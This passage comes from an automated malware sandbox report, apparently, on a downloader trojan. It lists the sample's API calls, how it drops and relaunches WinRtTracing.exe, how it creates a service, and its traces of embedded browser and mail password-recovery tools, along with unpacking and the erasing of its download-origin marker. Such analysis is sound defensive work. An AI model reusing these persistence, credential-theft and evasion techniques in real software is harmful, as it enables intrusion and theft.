                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: 0_2_0046392F CoCreateInstance,CoCreateInstance,CoCreateInstance,OleRun,0_2_0046392F
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: 0_2_0043DBEF __EH_prolog,FindResourceA,LoadResource,LockResource,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,0_2_0043DBEF
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 1_3_035B2E40 _snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,WaitForSingleObject,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,GetTickCount,_snwprintf,_snwprintf,_snwprintf,CopyFileW,OpenSCManagerW,CreateServiceW,StartServiceW,CloseServiceHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,1_3_035B2E40
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeFile created: C:\Users\user\AppData\Local\Microsoft\OutlookJump to behavior
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeFile created: C:\Users\user\AppData\Local\Temp\1A19.tmpJump to behavior
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCommand line argument: ~`@3_2_00405FD0
                    Source: SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeSystem information queried: HandleInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: WinRtTracing.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: WinRtTracing.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: WinRtTracing.exe, 00000001.00000003.1328991766.00000000037F1000.00000004.00000001.sdmp, WinRtTracing.exe, 00000005.00000001.1324276138.0000000000400000.00000040.00020000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: WinRtTracing.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: WinRtTracing.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: WinRtTracing.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: WinRtTracing.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe'
                    Source: unknownProcess created: C:\Windows\SysWOW64\webservices\WinRtTracing.exe C:\Windows\SysWOW64\webservices\WinRtTracing.exe
                    Source: unknownProcess created: C:\Windows\SysWOW64\webservices\WinRtTracing.exe 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' 'C:\Users\user\AppData\Local\Temp\1A19.tmp'
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\SysWOW64\webservices\WinRtTracing.exe 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' /scomma 'C:\Users\user\AppData\Local\Temp\23AF.tmp'
                    Source: unknownProcess created: C:\Windows\SysWOW64\webservices\WinRtTracing.exe 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' /scomma 'C:\Users\user\AppData\Local\Temp\2575.tmp'
                    Source: unknownProcess created: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe 'C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe' 'C:\Users\user\AppData\Local\Temp\1A19.tmp'
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeProcess created: C:\Windows\SysWOW64\webservices\WinRtTracing.exe C:\Windows\SysWOW64\webservices\WinRtTracing.exeJump to behavior
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeProcess created: C:\Windows\SysWOW64\webservices\WinRtTracing.exe 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' 'C:\Users\user\AppData\Local\Temp\1A19.tmp'Jump to behavior
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeProcess created: C:\Windows\SysWOW64\webservices\WinRtTracing.exe 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' /scomma 'C:\Users\user\AppData\Local\Temp\23AF.tmp'Jump to behavior
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeProcess created: C:\Windows\SysWOW64\webservices\WinRtTracing.exe 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' /scomma 'C:\Users\user\AppData\Local\Temp\2575.tmp'Jump to behavior
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeProcess created: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe 'C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe' 'C:\Users\user\AppData\Local\Temp\1A19.tmp'Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\RPCJump to behavior
                    Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: WinRtTracing.exe
                    Source: Binary string: cmd.pdbUGP source: WinRtTracingoe.exe, 00000007.00000000.1325483578.00007FF6E948E000.00000002.00020000.sdmp, WinRtTracingoe.exe.1.dr
                    Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: WinRtTracing.exe
                    Source: Binary string: cmd.pdb source: WinRtTracingoe.exe, 00000007.00000000.1325483578.00007FF6E948E000.00000002.00020000.sdmp, WinRtTracingoe.exe.1.dr

                    Data Obfuscation:

                    barindex
                    Detected unpacking (changes PE section rights)Show sources
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeUnpacked PE file: 3.2.WinRtTracing.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeUnpacked PE file: 5.2.WinRtTracing.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeUnpacked PE file: 6.2.WinRtTracing.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                    Detected unpacking (overwrites its own PE header)Show sources
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeUnpacked PE file: 3.2.WinRtTracing.exe.400000.0.unpack
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeUnpacked PE file: 5.2.WinRtTracing.exe.400000.0.unpack
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeUnpacked PE file: 6.2.WinRtTracing.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: 0_2_0044112E GetModuleHandleA,LoadLibraryA,GetProcAddress,#17,#17,FreeLibrary,0_2_0044112E
                    Source: WinRtTracingoe.exe.1.drStatic PE information: section name: .didat
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: 0_2_004185C4 push ebp; retf 0_2_004185C5
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: 0_2_00412FD0 push eax; ret 0_2_00412FFE
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: 0_2_004134C8 push eax; ret 0_2_004134E6
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 1_3_035B8B87 push FFFFFFB1h; ret 1_3_035B8B89
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 1_3_035BBAC4 push FFFFFFB1h; ret 1_3_035BBAD1
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 1_3_035B985F push FFFFFFB1h; ret 1_3_035B986D
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 3_2_004048C5 push ecx; ret 3_2_004048D8
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_2_00445190 push eax; ret 5_2_004451A4
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_2_00445190 push eax; ret 5_2_004451CC
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_2_00449EB4 push eax; ret 5_2_00449EC1
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_2_00444F79 push ecx; ret 5_2_00444F89
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_1_00445190 push eax; ret 5_1_004451A4
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_1_00445190 push eax; ret 5_1_004451CC
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_1_00449EB4 push eax; ret 5_1_00449EC1
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_1_00444F79 push ecx; ret 5_1_00444F89
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 6_2_00412341 push ecx; ret 6_2_00412351
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 6_2_00412360 push eax; ret 6_2_00412374
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 6_2_00412360 push eax; ret 6_2_0041239C
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 6_1_00412341 push ecx; ret 6_1_00412351
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 6_1_00412360 push eax; ret 6_1_00412374
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 6_1_00412360 push eax; ret 6_1_0041239C
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_000000014000F020 push rax; retf 7_2_000000014000F021
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00000001400182F9 push rax; ret 7_2_0000000140018329
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_0000000140018378 push rax; ret 7_2_0000000140018329

                    Persistence and Installation Behavior:

                    barindex
                    Drops executables to the windows directory (C:\Windows) and starts themShow sources
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeExecutable created and started: C:\Windows\SysWOW64\webservices\WinRtTracing.exeJump to behavior
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeExecutable created and started: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeJump to behavior
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeFile created: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeFile created: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 1_3_035B2E40 _snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,WaitForSingleObject,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,GetTickCount,_snwprintf,_snwprintf,_snwprintf,CopyFileW,OpenSCManagerW,CreateServiceW,StartServiceW,CloseServiceHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,1_3_035B2E40

                    Hooking and other Techniques for Hiding and Protection:

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeFile opened: C:\Windows\SysWOW64\webservices\WinRtTracing.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: 0_2_004080B3 IsIconic,GetWindowPlacement,GetWindowRect,0_2_004080B3
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: 0_2_0044E1A5 __EH_prolog,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,0_2_0044E1A5
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: 0_2_004284A0 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA,0_2_004284A0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: 0_2_0045298F IsWindowVisible,IsIconic,0_2_0045298F
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: 0_2_00401028 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,0_2_00401028
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: 0_2_00427CF0 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC,0_2_00427CF0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: 0_2_00456E4D LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,0_2_00456E4D
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe